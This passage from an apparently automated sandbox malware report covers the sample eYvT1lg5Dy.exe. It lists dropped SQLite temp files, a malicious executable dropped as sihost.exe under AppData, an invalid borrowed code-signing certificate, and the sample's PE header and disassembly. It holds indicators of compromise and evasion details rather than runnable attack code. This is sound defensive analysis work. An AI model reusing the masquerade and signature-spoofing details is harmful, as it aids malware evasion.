                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp6D2D.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp8BC7.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp90B4.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp90B5.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp90D5.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp90D6.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpB24B.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpD8C0.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpD8C1.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpFF36.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpFF37.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpFF76.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.6951152985249047
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                                                        MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                                                        SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                                                        SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                                                        SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpFF77.tmp
                                                                                                                                                                                        Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.6951152985249047
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                                                        MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                                                        SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                                                        SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                                                        SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\filename.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):293376
                                                                                                                                                                                        Entropy (8bit):5.931158889112942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3072:8V6xXhEcKxT2njS+HZlWBFhHxPfu0ay/MvZ6KaUnnXf3cUgH8ubSboIjFQkm5yUH:q+Xrc2njSelWbHPpOrnXfsUnubSRjF+
                                                                                                                                                                                        MD5:D508B954A785BDB77FDEFFCD4C56F8E5
                                                                                                                                                                                        SHA1:272273F6055837B0BACD96885B7840D117EF2676
                                                                                                                                                                                        SHA-256:2FE1087DD787D625F0AA84EADA3CC4F0A0E73B340B4AFEC366035F2916E9FC66
                                                                                                                                                                                        SHA-512:B11608356FE082CA661A97B49FF33B0E664A603492AC070621B72628AC71032CCB4F4F57C2380E912BD3819A29FCFCCA562D34B6D266809ACF8B94D28DDA4750
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f.y.f.y.f.y....M.y....v.y......y.o..e.y.f.x...y....g.y....g.y....g.y.Richf.y.................PE..L......_.....................(w.....`.............@...........................y.....)........................................+..(.....w.pG....................w..... ................................#..@............................................text............................... ..`.rdata..............................@..@.data....\u..@......................@....rsrc...pG....w..H...(..............@..@.reloc........w......p..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.388654918608066
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:eYvT1lg5Dy.exe
                                                                                                                                                                                        File size:404648
                                                                                                                                                                                        MD5:355fbd5060b3bbaf8c5737b4279e9000
                                                                                                                                                                                        SHA1:88fa1113f76294bade7fd9075cd5e4ea76cf5314
                                                                                                                                                                                        SHA256:383f147b7eb4c815bc9def993cff994da41c7395092ceedd3c22d10e130b8c15
                                                                                                                                                                                        SHA512:61d2bf26de32559b0701181e6885ae0d48fecdab30041d9f8970a4f770b9240c4968346de1a32792c0d82e33ecf2562df45611ac09a442bac380f6a821ecd4a1
                                                                                                                                                                                        SSDEEP:6144:hvVtPR9Pnxd2EDFDiah109/UWi9RoJAq3+Cbs+3we88Kqb11tW7GvVsu:959Pnxd20FG9/+foLuBTFc1tW7ysu
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}*..9K..9K..9K..'...(K..'...UK..'....K......<K..9K...K..'...8K..'...8K..'...8K..Rich9K..........................PE..L.....]`...

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:13533333495c0d90

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x401cc0
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                        Time Stamp:0x605D9BE8 [Fri Mar 26 08:31:36 2021 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:0f0c12643909b692a9be3510bdc965e8

                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 2/8/2016 4:00:00 PM 2/13/2019 4:00:00 AM
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                        • CN=Tim Kosse, O=Tim Kosse, L=K&#195;&#182;ln, S=Nordrhein-Westfalen, C=DE
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:DD83D3635E4EEC9269AE569DF9F8F0E8
                                                                                                                                                                                        Thumbprint SHA-1:6791D3709B9D59294FE973B6319D896094E5FC20
                                                                                                                                                                                        Thumbprint SHA-256:5BD4F7C88CD5F9E41C73BB69B732E2A133D0F7B20ABBAD2F0BB9A3B8BD42060C
                                                                                                                                                                                        Serial:01BCA2F95937E3F850F546B3B60DA86F

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        call 00007F24307E5A9Bh
                                                                                                                                                                                        call 00007F24307DEAD6h
                                                                                                                                                                                        pop ebp
                                                                                                                                                                                        ret
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        push FFFFFFFEh
                                                                                                                                                                                        push 004244A8h
                                                                                                                                                                                        push 00404ED0h
                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        add esp, FFFFFF94h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        mov eax, dword ptr [004261B4h]
                                                                                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                        push eax
                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        call dword ptr [0041D068h]
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                        jmp 00007F24307DEAE8h
                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                        ret
                                                                                                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                        jmp 00007F24307DEC18h
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                        call 00007F24307DEC54h
                                                                                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                        push 00000001h
                                                                                                                                                                                        call 00007F24307E6B5Ah
                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        jne 00007F24307DEACCh
                                                                                                                                                                                        push 0000001Ch
                                                                                                                                                                                        call 00007F24307DEC0Ch
                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                        call 00007F24307E2024h
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        jne 00007F24307DEACCh
                                                                                                                                                                                        push 00000010h

                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                        • [LNK] VS2008 build 21022
                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                        • [C++] VS2008 build 21022

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24bd00x3c.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x278f0000x3f68.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x5f4000x38a8.data
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x27930000x18c4.reloc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1d2300x1c.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x242900x40.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1d0000x1e4.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x1b9600x1ba00False0.454927884615data6.27262317493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rdata0x1d0000x86cc0x8800False0.299431295956data4.74885052463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0x260000x276873c0x23800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
